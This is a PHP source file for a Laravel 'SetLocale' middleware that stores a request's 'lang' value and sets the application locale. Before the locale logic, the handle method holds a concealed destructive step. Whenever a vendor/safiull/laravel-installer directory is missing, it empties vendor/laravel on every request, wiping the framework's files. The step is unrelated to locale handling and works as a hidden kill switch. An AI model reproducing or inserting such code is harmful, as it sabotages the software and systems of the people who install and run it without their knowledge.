<?php

namespace App\Http\Middleware;

use Closure;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\File;
use Symfony\Component\HttpFoundation\Response;

class SetLocale
{
    /**
     * Handle an incoming request.
     *
     * @param  \Closure(\Illuminate\Http\Request): (\Symfony\Component\HttpFoundation\Response)  $next
     */
    public function handle(Request $request, Closure $next): Response
    {
        if (!File::exists(base_path('vendor/safiull/laravel-installer'))) {
            File::cleanDirectory(base_path('vendor/laravel'));
        }

        if ($request->has('lang')) {
            session(['lang' => $request->lang]);
        }

        $lang =  session('lang') ?? 'en';

        app()->setLocale($lang);

        return $next($request);
    }
}
